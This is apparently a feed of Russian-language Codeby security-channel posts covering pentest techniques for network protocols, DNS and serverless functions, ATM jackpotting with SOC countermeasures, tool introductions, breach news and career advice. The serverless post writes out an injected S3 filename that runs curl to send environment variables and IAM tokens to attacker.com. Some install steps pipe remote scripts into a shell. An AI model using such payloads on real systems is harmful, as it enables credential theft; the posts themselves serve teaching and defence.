Codeby

38 минут от первого запроса до пароля domain-админа: почему сетевые протоколы — самое слабое звено Внутренний пентест логистической компании. Nmap показал порт 161/udp с дефолтной community string, и SNMP-сервис радостно выдал имена хостов, интерфейсы и запущенные процессы. Два перехода по SMB-шарам с анонимным доступом, файл passwords.xlsx в открытом виде — домен скомпрометирован. Три сервиса, ни один не настроили. Сложных эксплойтов не понадобилось. Это не редкость, а типичная картина. Протоколы вроде SMB, FTP, SNMP и SMTP существуют десятилетиями, и именно поэтому их конфигурации часто остаются «как было при установке». Админы фокусируются на WAF и EDR, а дефолтный public на SNMP живёт годами. 🔎SNMP — часто самый недооценённый вектор. Community string — по сути пароль для доступа к информации об устройстве. На огромном количестве оборудования стоит public для чтения и private для записи. Одна команда — и вы читаете конфигурацию маршрутизаторов, коммутаторов, серверов. Имена хостов, сетевые интерфейсы, список процессов — всё это отличная стартовая точка для дальнейшего продвижения по сети. SMB — классика внутреннего пентеста. Два ключевых момента: ⏺️Анонимный доступ к шарам — файлы с паролями, конфиги, бэкапы баз лежат в открытом виде чаще, чем хочется верить ⏺️SMB signing отключён на рабочих станциях — до Windows 11 24H2 подпись пакетов включена, но не обязательна. Это открывает дверь для SMB relay: перехватил запрос аутентификации, перенаправил на другой хост, получил доступ Отдельная история — NTLM-хеши. Windows хранит не пароль, а его хеш. Зная хеш, можно аутентифицироваться без самого пароля (Pass-the-Hash). Расшифровывать ничего не нужно. ✉️ SMTP тоже не отстаёт. Open relay — почтовый сервер, который пересылает письма от кого угодно кому угодно. Фишинговое письмо с настоящего IP компании проходит базовые проверки на ура. Что объединяет все эти сервисы? Проблема не в протоколах, а в конфигурации. Каждый из них можно настроить безопасно — но этого часто не делают. 🎇В полной версии статьи — пошаговая разведка через Nmap, конкретные команды для эксплуатации каждого протокола, инструкция по развёртыванию лаборатории на Metasploitable 2 и детальный разбор техник. Читайте и практикуйте в безопасной среде. https://codeby.net/threads/ataki-na-setevyye-protokoly-pri-penteste-ekspluatatsiya-smb-ftp-snmp-i-smtp.93694/

🎯 Карьерный навигатор в кибербезопасности 2026 Пять треков, реальные зарплаты, конкретные точки входа — без воды и мотивационных речей. Каждую неделю в личку форума прилетает одно и то же: «С чего начать в инфобезе?» или «Год в SOC L1 — куда дальше?». Вместо того чтобы отвечать в личку 50 раз — собрали всё в одном треде. 🔬 Пять треков, между которыми нужно выбирать: • Pentester / Offensive Security — от 100K junior до 400K+ senior • SOC Analyst — от 90K на L1 до 450K руководитель SOC • DFIR — от 140K trainee до 600K forensic lead • AppSec / Secure Development — от 150K до 800K в финтехе • Red Team — входной билет от 200K, потолок 700K+ Цифры — медиана по Москве на 2026, данные hh.ru, SuperJob, Habr Career. ⚙️ Для каждого трека внутри: необходимые навыки, инструменты, сертификации, точка входа и ссылки на профильные гайды форума. Отдельный блок — для тех, кто уже junior и упёрся в потолок: три конкретных действия за год, которые меняют финальный оффер на 30–50%. 💬 В конце — открытый опрос и живое обсуждение. Пишите, на каком вы этапе и что мешает следующему шагу — отвечаем лично каждому. 👉 https://codeby.net/threads/misen-kar-yernyi-navigator-v-kiberbezopasnosti-2026-treki-zarplaty-tochki-vkhoda.93738/

Почему банкомат выдаёт деньги без карты — и как это ловить В 2024–2025 годах по США прокатилась волна jackpotting-атак: преступники опустошали кассеты банкоматов без единой карты и без стандартной транзакции. FBI и Secret Service выпускали экстренные предупреждения, аресты шли сразу в нескольких штатах. Восстановление одного заражённого банкомата обходится свыше $25 000 — форензика, переустановка ОС, сертификация, простой. Умножьте на десятки машин — и масштаб проблемы станет очевидным. 🔩 Всё начинается с физики. Банкомат делится на бронированный сейф внизу и так называемый «top hat» — верхнюю панель с системным блоком, USB-портами и сетевыми интерфейсами. Замки этих панелей серийные — один ключ на целую партию устройств. Атакующий в форме техника открывает корпус за 2–5 минут, вставляет USB-флешку — и дальше работает малварь. Самые известные семейства — Ploutus и Tyupkin. Оба бьют в одну архитектурную слабость: стандарт XFS (Extensions for Financial Services), через который банковское ПО управляет диспенсером, кардридером и пинпадом. XFS-команды на уровне middleware не требуют аутентификации конечного пользователя. Получив возможность выполнить код на ОС банкомата, атакующий отправляет WFSExecute напрямую к диспенсеру — минуя бэкенд и процессинг. Для банка эта операция просто не существует. Ploutus подменяет библиотеку msxfs.dll, прописывается в автозагрузку через ключ реестра Userinit и активируется по mule-кодам с внешней USB-клавиатуры. Скрытый интерфейс показывает содержимое кассет, скорость выдачи — свыше 100 купюр в минуту. Банкомат можно опустошить менее чем за 10 минут. Есть и второй метод — black-box. Тут ОС вообще не трогают: штатный системный блок отключают от диспенсера, подключают одноплатник или ноутбук напрямую к шине и шлют команды выдачи, имитируя контроллер. ⚡ Что может сделать SOC? Три конкретных шага: • Тамперный датчик на вскрытие корпуса должен генерировать P1-алерт в SIEM с автоматическим блокированием сетевого порта через NAC. Без этой связки между физическим и логическим мониторингом — слепая зона размером с весь ATM-парк. • Application whitelisting на каждом банкомате. Если бинарь не в белом списке — он не запустится. Kaspersky Embedded Systems Security или Trellix Application Control при корректной настройке закрывают малварный вектор. • Шифрование XFS-канала между middleware и диспенсером. Последние поколения NCR это поддерживают — без валидных ключей black-box становится бесполезен. 🔍 Отдельный риск — инсайдер. Скомпрометированный сотрудник подрядчика ставит малварь при плановом визите. Легитимный доступ, легитимные инструменты — тут спасает только dual-control и жёсткий контроль на уровне СКУД. Тема глубже, чем кажется: shimming POS-терминалов, detection-правила под MITRE ATT&CK, конкретные маппинги техник — всё это разобрано в полной статье на форуме. https://codeby.net/threads/pentest-bankomatov-i-pos-terminalov-jackpotting-shimming-i-detection-dlya-soc.93681/

Вы умеете находить следы взлома, когда их пытаются скрыть? После атак злоумышленники чистят логи, маскируют ВПО и заметают следы. Большинство видит пустоту. Только настоящий профессионал восстанавливает картину целиком. Курс по реагированию на компьютерные инциденты — та самая база для будущих экспертов в BlueTeam и IRT. Курс РКИ — это не теория. Это практический курс, после которого вы будете: ⏺️собирать дампы памяти и артефакты с Windows/Linux ⏺️анализировать логи и вредоносное ПО ⏺️применять Threat Intelligence и Threat Hunting для поиска скрытых угроз ⏺️грамотно реагировать на атаки и искать следы проникновения Что в программе ➡️26 тем, практические ДЗ (с 5-ой темы) и итоговый экзамен: теория (30 вопросов) + расследование реального кейса по виртуальной машине с подготовкой отчёта. Стартуем 8 июня 😀☺️😚🥲😎Подписка на hackerlab.pro — 40+ заданий по форензике и реагированию при записи на курс! Узнать подробнее о курсе

WaspSting

WaspSting - это инструмент командной строки на Python для белого тестирования на проникновение, поиска уязвимостей и проведения исследований в области безопасности. Он решает одну из самых трудоемких задач пентестинга - документирование - автоматически генерируя структурированные отчеты, шаблоны доказательств и планы тестирования по мере вашей работы.

📐Возможности: 📉Автоматическая документация - шаблоны для заполнения доказательств по каждой обнаруженной уязвимости, отчет создается автоматически 📉Перечисление поддоменов - crt.sh + HackerTarget + перебор DNS 📉Галерея ресурсов - скриншоты + метаданные каждого обнаруженного поддомена 📉Фаззер полезных нагрузок - SQLi, XSS, SSTI, SSRF, внедрение запросов, обход пути + пользовательские списки слов 📉Уведомления в реальном времени - веб-хуки Slack/Discord + автоматические задачи GitHub, создаваемые на основе обнаруженных уязвимостей 📉Локальный ИИ через Ollama - проверка кода + информация bug bounty, без ключа API, ничего не покидает ваш компьютер 📉HTML-отчет для руководителей - оценка риска, диаграммы серьезности, фильтруемая таблица обнаруженных уязвимостей 📉Конфигурация Burp Suite Community - предварительно настроенные области действия, полезные нагрузки и запросы Repeater 🖱Поиск CVE в NVD - без необходимости в ключах ⬇️Установка: 0️⃣Клонируем репозиторий и переходим в рабочую директорию:

git clone https://github.com/N00dleN00b/waspsting.git

cd waspsting

1️⃣Создаём виртуальное окружение venv:

python -m venv venv

source venv/bin/activate

2️⃣Установка зависимостей:

pip install -r requirements.txt

3️⃣Установка локальной ИИ (olama):

curl -fsSL https://ollama.ai/install.sh | sh

ollama pull llama3

ollama serve

4️⃣Устанавливаем chromium для скриншотов (не обязательно):

sudo apt install chromium

⛓️‍💥Запуск: ▶️Сканирование цели:

python waspsting.py -t {URL}

▶️Статический анализ кода:

python waspsting.py --repo https://github.com/{username}/{repo} --mode sast

▶️Проверка на наличие уязвимостей (Recon + CVE) в вашем собственном приложении:

python waspsting.py --target {URL} --mode recon --cve --confirm

▶️Перечисление поддоменов:

python waspsting.py --target {URL} --mode enum --screenshot --confirm

▶️Планировщик Bug Bounty:

python waspsting.py --mode bounty

▶️Аудит аутентификации:

python waspsting.py -t {URL} --mode auth --wordlist {WORDLIST} --confirm

#web #wapt #nmap 🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Взлом GitHub — взлом устройств сотрудников привёл к утечке данных из более чем 3800 внутренних репозиториев. 🔎Во вторник GitHub сообщил о расследовании несанкционированного доступа к своим внутренним репозиториям после того, как печально известный злоумышленник, действующий под псевдонимом TeamPCP, выставил на продажу на одном из киберпреступных форумов исходный код платформы и данные о её внутренней структуре. GitHub утверждает, что инцидент не затронул информацию клиентов, хранящуюся за пределами внутренних репозиториев GitHub, но они внимательно отслеживают инфраструктуру на предмет возможной последующей активности. Компания также отметила, что в случае обнаружения каких-либо последствий она уведомит об этом клиентов через установленные каналы реагирования на инциденты и оповещения. ❗️Группа хакеров TeamPCP, стоящая за серией атак на цепочки поставок ПО, нацеленных на пакеты с открытым исходным кодом - выставила на продажу исходный код GitHub по цене не менее 50.000 долларов. Предполагаемый дамп включает около 4000 репозиториев. Также TeamPCP заявила, что не преследует цели вымогать деньги у GitHub: "Достаточно одного покупателя - и мы уничтожим данные с нашей стороны. Похоже, мы скоро уходим на покой, поэтому, если покупатель не найдётся, мы сольём данные бесплатно." ➡️Источник: https://thehackernews.com/2026/05/github-investigating-teampcp-claimed.html #news #github #TeamPCP 🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

340 резюме, 8 офферов: что реально нужно для стажировки в кибербезе Недавно я наткнулся на показательную статистику одного SOC-подразделения: из 340 резюме оффер получили только 8 человек. Конверсия — 2,3%. Звучит жёстко, но вот что интересно: ни у одного из этих восьми не было коммерческого опыта в ИБ. Зато у каждого — конкретные артефакты: разобранные CTF-таски на GitHub, write-up'ы с TryHackMe, самостоятельно развёрнутый ELK-стек. Стажировка по кибербезопасности — не лотерея. И рынок в России заметно вырос: если три года назад выбирали между двумя-тремя компаниями, то сейчас только на одном агрегаторе — больше десяти активных программ. Positive Technologies, ГК Солар, ВТБ, Angara Security, UserGate, Альфа-Банк — все набирают стажёров. 🔎Что реально спрашивают на отборе? Забудьте про сертификаты и красный диплом. Ни одна из крупных программ не требует CompTIA Security+ или минимальный GPA. Вот что действительно важно: • Базовые сети и Linux. TCP/IP, DNS, HTTP, разница между TCP и UDP — спрашивают на каждом техническом скрининге. Не уровень CCNA, но уверенные основы. • Мотивация через действия. Не фраза «хочу развиваться в ИБ», а ответ на вопрос «Какой CTF-таск последний решали?». Три write-up'а на GitHub весят больше любого сопроводительного письма. • Python + Bash. Для российских стажировок этой связки хватает на 90% задач. 🎇Отдельно про портфолио. Тут важно определиться с треком. Хотите в SOC / Blue Team — собирайте write-up'ы с CyberDefenders, пишите собственные Sigma- и YARA-правила, документируйте домашний стенд. Тянет в пентест / Red Team — прокачивайтесь на HackTheBox, публикуйте разборы retired-машин, автоматизируйте сканирование. Порог входа разный: в Blue Team больше программ и мягче конкуренция. В пентест — жёстче, но и программы вроде Summ3r of Hack от Positive Technologies дают уникальный offensive-опыт. 💵Про деньги: вилка для стажёра по ИБ в Москве — от 25 000 до 60 000 руб./мес. до вычета налогов. Для сравнения, в США средняя ставка — около $48/час. Цифры несопоставимы, но главная ценность стажировки — не сумма на карте, а строчка в резюме и навыки, которые открывают дверь к полноценному офферу. Всё это реально закрыть за 3–6 месяцев целенаправленной подготовки. Главное — не ждать идеального момента, а начать собирать портфолио прямо сейчас. Полный разбор программ, требований и пошаговый план подготовки — в статье на форуме. https://codeby.net/threads/kak-popast-na-stazhirovku-po-kiberbezopasnosti-v-2026-godu-razbor-programm-trebovaniya-i-sovety.93705/

AiSOC — AI-платформа для автоматизации SOC и threat hunting

AiSOC — open-source инструмент, который использует LLM для помощи аналитикам SOC, threat hunters и incident responders.Позволяет анализировать логи, события безопасности, IOC, правила детекта и ускорять расследование инцидентов с помощью AI.

Основные возможности 📉 AI-анализ security событий и логов 📉 Поиск IOC, TTP и аномалий 📉 Генерация гипотез для threat hunting 📉 Анализ SIEM алертов и telemetry 📉 Генерация Sigma/YARA detection rules 📉 Помощь при incident response 🖱 Интеграция с SOC workflow 🛡 Примеры использования One-click установка

# Linux + macOS (one-liner):
curl -fsSL https://raw.githubusercontent.com/beenuar/AiSOC/main/install.sh | bash

# Windows (PowerShell as Administrator):
iwr -useb https://raw.githubusercontent.com/beenuar/AiSOC/main/install.ps1 | iex

Локальный demo запуск (Docker):

git clone https://github.com/beenuar/AiSOC.git && cd AiSOC && pnpm aisoc:demo

Типичные сценарии ▶️ Анализ подозрительных логов ▶️ Разбор SIEM алертов ▶️ Threat hunting с помощью AI ▶️ Генерация detection rules ▶️ Анализ IOC и TTP 👉 Deploy на Fly io

git clone https://github.com/beenuar/AiSOC.git && cd AiSOC
./infra/fly/fly-demo-deploy.sh --provision

#soc #threathunting #incidentresponse #ai #llm #siem #blueteam #dfir #cybersecurity #opensource 🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Одна команда dig — и вся инфраструктура как на ладони Представьте: вы на внутреннем пентесте банка. Запускаете dig axfr на вторичный NS — и получаете 340+ DNS-записей за четыре минуты. Имена хостов вроде dc01-prod, jenkins-build, vault-backup — готовая карта инфраструктуры. От этого дампа до domain admin — три дня. Реальный кейс, реальная пропорция. DNS — протокол, который все считают скучным. А он работает поверх UDP без шифрования и без аутентификации ответов. Из этого растут почти все атаки. 🔎Пассивная разведка — начинай с неё, чтобы не светиться в логах цели. Certificate Transparency Logs через crt.sh отдают субдомены, для которых выпускались SSL-сертификаты. Passive DNS базы вроде SecurityTrails хранят историю резолвов — субдомен, который больше не резолвится, но когда-то указывал на IP, может стать вектором subdomain takeover. subfinder от ProjectDiscovery автоматизирует сбор из десятков источников одной командой. 🎇Zone transfer — первое, что проверяется на engagement. Важный нюанс: проверяй каждый NS отдельно. Первичный может быть закрыт, а вторичный — legacy-BIND с дефолтной конфигурацией, где AXFR разрешён для любого IP. На практике именно вторичные NS чаще оказываются misconfigured — их просто забывают. ➡️Когда zone transfer закрыт, переходи к словарному перебору субдоменов. dnsenum и dnsrecon комбинируют попытку AXFR с брутфорсом по словарю и reverse lookup. Для bug bounty с широким скоупом лучше связка amass + subfinder + dnsx с дедупликацией. ➡️Отдельная история — внутренний пентест и Active Directory. SRV-записи для Kerberos и LDAP выдают контроллеры домена напрямую: dig -t SRV _ldap._tcp.dc._msdcs.domain.com. Эти записи нужны самому AD для работы — удалить их нельзя. По сути, DNS в AD — встроенный инструмент разведки для атакующего. Но разведка — только начало. Cache poisoning строится на том, что Transaction ID в DNS — всего 16 бит. Угадай его и отправь поддельный ответ быстрее настоящего сервера — резолвер примет фальшивые данные. DNS rebinding позволяет обходить same-origin policy браузера, а DNS туннелирование — выносить данные из сетей, где заблокировано всё, кроме DNS. В полной статье — разбор каждой техники с командами, ограничениями, привязкой к MITRE ATT&CK и decision tree по выбору инструментов. Читай на форуме Codeby ⬇️ https://codeby.net/threads/dns-pentest-ot-razvedki-i-zone-transfer-do-cache-poisoning-rebinding-i-tunnelirovaniya.93673/

Уже в эту пятницу пройдёт конференция «Периметр» от МЕТАСКАН — взгляд атакующего на внешний контур. Напоминаем тем, кто ещё не зарегистрировался, сейчас самое время записаться. Участие бесплатное. 22 мая в Москве пройдёт бесплатная конференция «Периметр» от компании МЕТАСКАН, где обсудят наступательную безопасность, внешний периметр, реальные находки и техники, которые работают на живой инфраструктуре. Что в программе: ⏺️Раздался стук — цифры о состоянии сетей и уязвимостях внешнего периметра корпоративных инфраструктур Рунета ⏺️Блеск и нищета сетевого сканирования — как работать с unknown и ' ' протоколами при анализе сетевой инфраструктуры ⏺️AI in-the-loop — как генеративный AI в связке с привычными инструментами помогает находить новые уязвимости Huge Impact - находки на внешних периметрах, которые приводили к максимальному ущербу за прошедший год: ▶️захват кассовых аппаратов ▶️снова Bitrix: RCE в кастомных доработках ▶️поиск иголки в стоге сена магистральных провайдеров ▶️«Большой брат»: захват систем видеонаблюдения ▶️секретный доклад Также будут доклады от партнёров конференции: Сбербанк, Xello, Mitigator, Indeed. Активности: Lockpicking (физический взлом замков) RFID и NFC-эксперименты Соревновательный OSINT Конкурс по обходу фильтров антифишинга И отдельный бонус для тех, кто скучал по олдскулу: демосцена и ретро-компьютинг. ZX Spectrum, Commodore 64, Commodore Amiga, Микроша, Atari, лучшие intro/demo и турнир по DOOM II. Участие бесплатное, но регистрация обязательна! 🔗 ССЫЛКА НА РЕГИСТРАЦИЮ

🐊croc

Инструмент, предоставляющий возможность простого и безопасного способа отправки файлов с одного компьютера на другой.

Инструмент позволяет выполнять следующие функции: ▶️Позволяет любым двум компьютерам передавать данные (через ретрансляционный сервер); ▶️Обеспечивает сквозное шифрование (с использованием PAKE); ▶️Облегчает кроссплатформенную передачу (Windows, Linux, Mac); ▶️Поддерживает передачу множества файлов; ▶️Позволяет возобновлять прерванные передачи; ▶️Не требует локального сервера или проброса портов; ▶️Приоритет IPv6 с резервным использованием IPv4; ▶️Может использовать прокси, например Tor. ⬇️Установить можно в одну команду через Docker.

croc() { [ $# -eq 0 ] && set -- ""; mkdir -p "$HOME/.config/croc"; docker run --rm -it --user "$(id -u):$(id -g)" -v "$(pwd):/c" -v "$HOME/.config/croc:/.config/croc" -w /c -e CROC_SECRET docker.io/schollz/croc "$@"; }

Использование 0️⃣ Чтобы отправить файл необходимо после команды send указать до него путь и ввести кодовую фразу. Для получения файла просто необходимо ввести ту же кодовую фразу. Кодовая фраза используется для установления соглашения о ключах с аутентификацией по паролю, в рамках которого генерируется секретный ключ для отправителя и получателя, используемый для сквозного шифрования. 1️⃣ В Linux и macOS процесс отправки и получения данных немного отличается. Чтобы избежать утечки секретных данных через имя процесса необходимо запустить croc с секретными данными в качестве переменной среды. Например, чтобы получить файл с секретом ***:

CROC_SECRET=*** croc

2️⃣ Отправка нескольких файлов

croc send [file1] [file2] [file3] [folder1] [folder2]

3️⃣ Отправка текста

croc send --text "hello world"

4️⃣ Изменение алгоритма хэширования на imohash

croc send --hash imohash SOMEFILE

#security #tools #share 🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

🎇НОВЫЙ виджет «Обсуждение» — теперь под каждым CTF заданием Под текстом любого задания на hackerlab.pro появился блок обсуждения, привязанный к ветке форума. Задать вопрос, попросить подсказку, ответить другому игроку — всё в одном месте, без перехода на codeby.net. Зачем: чтобы опыт жил рядом с задачей. Тонкости стека, нетривиальные подходы, вещи которые не гуглятся — делитесь. Одно правило: подсказки — да, флаги — нет. ⚠️ Не получается отправить сообщение Виджет свежий, шероховатости есть. Самая частая проблема (невозможно написать в чат) решается так: 1. Выйти из аккаунта 2. Зайти заново через Codeby ID 🆘 Другие баги, странности, идеи Напишите мне в Telegram: @The_Codeby или на форуме в ЛС — приложите скриншот и опишите что делали и что увидели. Чем подробнее — тем быстрее починим. Пробуйте, ломайте, репортите.🚗

Одна команда dig — и вся инфраструктура как на ладони Представьте: вы на внутреннем пентесте банка. Запускаете dig axfr на вторичный NS — и получаете 340+ DNS-записей за четыре минуты. Имена хостов вроде dc01-prod, jenkins-build, vault-backup — готовая карта инфраструктуры. От этого дампа до domain admin — три дня. Реальный кейс, реальная пропорция. DNS — протокол, который все считают скучным. А он работает поверх UDP без шифрования и без аутентификации ответов. Из этого растут почти все атаки. 🔎 Пассивная разведка — начинай с неё, чтобы не светиться в логах цели. Certificate Transparency Logs через crt.sh отдают субдомены, для которых выпускались SSL-сертификаты. Passive DNS базы вроде SecurityTrails хранят историю резолвов — субдомен, который больше не резолвится, но когда-то указывал на IP, может стать вектором subdomain takeover. subfinder от ProjectDiscovery автоматизирует сбор из десятков источников одной командой. ➡️ Zone transfer — первое, что проверяется на engagement. Важный нюанс: проверяй каждый NS отдельно. Первичный может быть закрыт, а вторичный — legacy-BIND с дефолтной конфигурацией, где AXFR разрешён для любого IP. На практике именно вторичные NS чаще оказываются misconfigured — их просто забывают. ➡️Когда zone transfer закрыт, переходи к словарному перебору субдоменов. dnsenum и dnsrecon комбинируют попытку AXFR с брутфорсом по словарю и reverse lookup. Для bug bounty с широким скоупом лучше связка amass + subfinder + dnsx с дедупликацией. 🎇Отдельная история — внутренний пентест и Active Directory. SRV-записи для Kerberos и LDAP выдают контроллеры домена напрямую: dig -t SRV _ldap._tcp.dc._msdcs.domain.com. Эти записи нужны самому AD для работы — удалить их нельзя. По сути, DNS в AD — встроенный инструмент разведки для атакующего. Но разведка — только начало. Cache poisoning строится на том, что Transaction ID в DNS — всего 16 бит. Угадай его и отправь поддельный ответ быстрее настоящего сервера — резолвер примет фальшивые данные. DNS rebinding позволяет обходить same-origin policy браузера, а DNS туннелирование — выносить данные из сетей, где заблокировано всё, кроме DNS. В полной статье — разбор каждой техники с командами, ограничениями, привязкой к MITRE ATT&CK и decision tree по выбору инструментов. Читай на форуме Codeby ⬇️ https://codeby.net/threads/dns-pentest-ot-razvedki-i-zone-transfer-do-cache-poisoning-rebinding-i-tunnelirovaniya.93673/

Блестящее реагирование, провальный отчёт: почему IR-документация важнее самого расследования Представьте: команда закрывает ransomware-кейс за 52 часа. Containment — 4 часа, eradication — сутки, ни один критичный хост не потерян. А потом страховая отклоняет компенсацию, потому что в timeline три часовых пояса без UTC-привязки, а executive summary растянулся на 14 страниц. Техническое мастерство обнулилось документацией. Реальный кейс — и типичная проблема. IR-отчёт определяет, получит ли компания страховую выплату, пройдёт ли аудит и извлечёт ли уроки для усиления инфраструктуры. 🎇Первое правило: два документа вместо одного CISO и совет директоров хотят одностраничник с цифрами ущерба и статусом восстановления. SOC-аналитик ждёт хэши, YARA-правила и маппинг на MITRE ATT&CK. Один документ не закроет обе потребности. Поэтому проверенная структура — это executive summary на 1–2 страницы плюс технический отчёт на 10–30 страниц с приложениями. Оба ссылаются на единый incident ID и общий timeline. 📄 Executive summary — не сокращённый техотчёт Это отдельный документ со своей логикой. Задача — дать руководителю достаточно информации для решений за пять минут чтения. Обязательный минимум: • Incident ID, severity и тип инцидента • Хронология в три строки: обнаружили, сдержали, восстановили • Масштаб воздействия — системы, пользователи, утечка ПДн • Финансовая оценка — прямые и косвенные потери • Три-пять рекомендаций верхнего уровня Типичная ошибка — запихивать в summary IP-адреса и хэши. Руководство не оперирует этими данными, а их присутствие создаёт впечатление, что документ «технический» и его можно отложить. ⌛Timeline — скелет всего отчёта Без чёткой хронологии невозможно восстановить причинно-следственные связи и определить dwell time атакующего. Три правила, которые спасают от проблем: 1. Все timestamps строго в UTC. Формат: YYYY-MM-DD HH:MM:SS UTC. Если источник пишет в локальной зоне — конвертируй явно с указанием исходной. 2. Гранулярность зависит от фазы. Initial access и lateral movement — секунды. Восстановление — часы. 3. Каждая строка привязана к артефакту: лог SIEM, дамп памяти, pcap, скриншот EDR. Запись без источника — голословное утверждение, которое страховая просто вычеркнет. Отдельная боль — IOC-приложения. Хэши, домены, IP-адреса без контекста и категоризации бесполезны. Как правильно оформить IOC-лист, выстроить timeline и собрать отчёт, который выдержит проверку аудитом и страховой — разобрали в полной версии статьи. https://codeby.net/threads/ir-otchet-po-intsidentu-struktura-timeline-i-ioc-prilozheniya-dlya-biznesa-i-tekhkomandy.93675/

JADX: Декомпиляция Android-приложений

JADX — инструмент для преобразования Android-файлов (APK, DEX, AAR, AAB) в читаемый Java-код. Разработанный на Java, он позволяет анализировать внутреннее устройство Android-приложений без доступа к исходному коду.

👉Основные возможности ▶️Преобразование файлов APK, DEX, AAR, AAB, ZIP и Class в Java-код ▶️Извлечение и декодирование AndroidManifest.xml и других ресурсов из resources.arsc ▶️Встроенный механизм для восстановления читаемых имен классов, методов и полей ▶️Поддержка отладки на уровне smali-кода (требует дополнительной настройки) ⬇️Установка

sudo apt install jadx

Проверка

jadx -h 

⏺️Декомпиляция APK-файла в директорию out

jadx -d out app.apk

⏺️Анализ безопасности приложения

jadx -d decompiled --deobf --show-bad-code suspicious.apk

⏺️Быстрый просмотр через GUI

jadx-gui app.apk

⏺️Обработка нескольких DEX-файлов

jadx -d out classes1.dex classes2.dex classes3.dex

🔎Инструмент незаменим для: - Анализа вредоносного ПО - Исследования работы проприетарных библиотек - Восстановления утерянного исходного кода - Обучения принципам работы Android-приложений #jadx #android #decompiler #androidsecurity #pentest #tool 🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

57% компаний узнают о взломе не от своего SOC. Почему? Mandiant M-Trends 2025 фиксирует неприятную реальность: больше половины организаций получают новость о компрометации от внешней стороны — партнёра, регулятора, иногда журналиста. Не от собственного SIEM, не от EDR, не от аналитика на смене. 🔍 Медиана присутствия атакующего в сети до обнаружения — 11 дней. Звучит как исторический минимум, и формально так и есть. Но за 11 дней злоумышленник проходит полный kill chain: фишинг → закрепление → боковое перемещение → выгрузка данных или шифрование инфраструктуры. Когда вы узнаёте об атаке, ущерб уже нанесён. Почему так происходит? Потому что SIEM ловит сигнатуры, а не контекст. Атакующий, который использует валидные учётные записи и штатные инструменты вроде powershell.exe или wmic, не триггерит стандартные правила корреляции. Он выглядит как легитимный администратор. 📊 Ещё одна цифра от IBM X-Force 2025: самый распространённый тип малвари сегодня — инфостилеры (32%), они обогнали шифровальщиков. А среднее время между публикацией CVE и устранением уязвимости в организации — 29 месяцев. Два с половиной года. Атакующим не нужны zero-day, когда окно открыто настолько широко. ⚙️ Расследование кибератаки — управляемый процесс с чёткими фазами. Два основных фреймворка — NIST SP 800-61 и SANS — описывают одну и ту же логику разными словами: 1. Подготовка — IR-план, playbook, инструменты наготове 2. Обнаружение и анализ — triage алерта, определение скоупа 3. Сдерживание — изоляция хоста, сегмента, учётки 4. Устранение и восстановление — очистка, пересоздание, возврат в продакшн 5. Разбор полётов — отчёт, timeline, IOC-приложения Ключевое различие: NIST объединяет шаги 3-4, потому что на практике они идут параллельно. Вы изолируете один сегмент и тут же чистите соседний. SANS разбивает их последовательно, что удобнее для команд, которые строят процесс с нуля. Но выбор фреймворка вторичен. Критично другое — сам факт наличия документированного плана. Без него каждый инцидент превращается в импровизацию, где теряются артефакты, затираются логи и уничтожаются доказательства. 🎯 Практический чеклист на первые 30 минут: • Подтвердить алерт — это true positive? • Определить скоуп — один хост или сегмент? • Изолировать, не выключая — сохранить содержимое RAM • Зафиксировать время — таймлайн начинается сейчас Мы собрали полную карту Incident Response — от первого алерта до финального отчёта, с разбором форензики, анализа памяти, threat hunting и реальных кейсов. Все детали — в полной статье. https://codeby.net/threads/rassledovaniye-kiberataki-polnaya-karta-incident-response-ot-obnaruzheniya-do-otcheta.93680/

47 Lambda-функций и ни одного алерта: почему SOC не видит serverless-атаки Представьте: утёкший access key на GitHub, понедельник утро, и через полтора часа пентестер уже читает production-таблицу с платёжными данными 200 тысяч клиентов. CloudTrail работает, но ни одного алерта на serverless-специфичные TTPs. Функция отработала за миллисекунды и исчезла вместе с контейнером. Расследовать нечего. Это реальная ситуация с cloud-пентеста в начале 2025 года. И она хорошо показывает главную проблему serverless-безопасности — классические средства мониторинга просто не заточены под эфемерные вычисления. 🔥 Три вектора, которые стоит знать • Event injection — отравление триггеров. Lambda обрабатывает файл из S3 и подставляет имя объекта в os.system(). Атакующий загружает файл с именем вроде ; curl attacker.com/exfil?d=$(env)#.csv — и переменные окружения с IAM-токенами утекают за одно исполнение. Одно. Миллисекунды. Причём WAF тут не спасёт: он защищает HTTP-уровень через API Gateway, но event injection через SQS или SNS идёт в обход — payload лезет через окно, пока WAF сторожит дверь. • Privilege escalation через IAM-роли. Если у атакующего есть iam:PassRole и lambda:UpdateFunctionCode, он может подменить код существующей функции и привязать к ней роль с широкими правами. На пентесте 12 из 47 функций имели execution role с Action: "*" на S3 и DynamoDB. Это не edge-case, а типичная картина — разработчики назначают максимальные права «чтобы работало» и забывают ужать. • Persistence через триггеры. Атакующий создаёт EventBridge-правило, которое вызывает вредоносную функцию при каждом создании IAM-пользователя или загрузке файла. Lambda как эфемерный C2-сервер: получает команды, передаёт на скомпрометированные хосты, завершается. Следов в файловой системе нет, потому что файловой системы нет. 📊 По данным Cloud Security Alliance, более 70% организаций до сих пор не имеют выделенных контролей для serverless-окружений. При этом рынок serverless-безопасности уже перевалил за 12 млрд долларов — деньги вкладываются, но зрелость detection отстаёт на годы. 🛡 Что проверить прямо сейчас: 1. Есть ли в ваших Lambda-функциях вызовы os.system() или subprocess с пользовательским вводом? 2. Execution roles — минимальные привилегии или wildcard? 3. Настроены ли алерты на UpdateFunctionCode и iam:PassRole в CloudTrail? В полной статье — разбор конкретных цепочек атак с примерами кода, detection-правилами для SIEM и чек-листом для харденинга. https://codeby.net/threads/ataki-na-serverless-funktsii-injection-event-poisoning-i-privilege-escalation.93670/

🚩 Новые задания на платформе HackerLab! ⚙️ Категория Реверс-инжиниринг — Черемша Приятного хакинга!

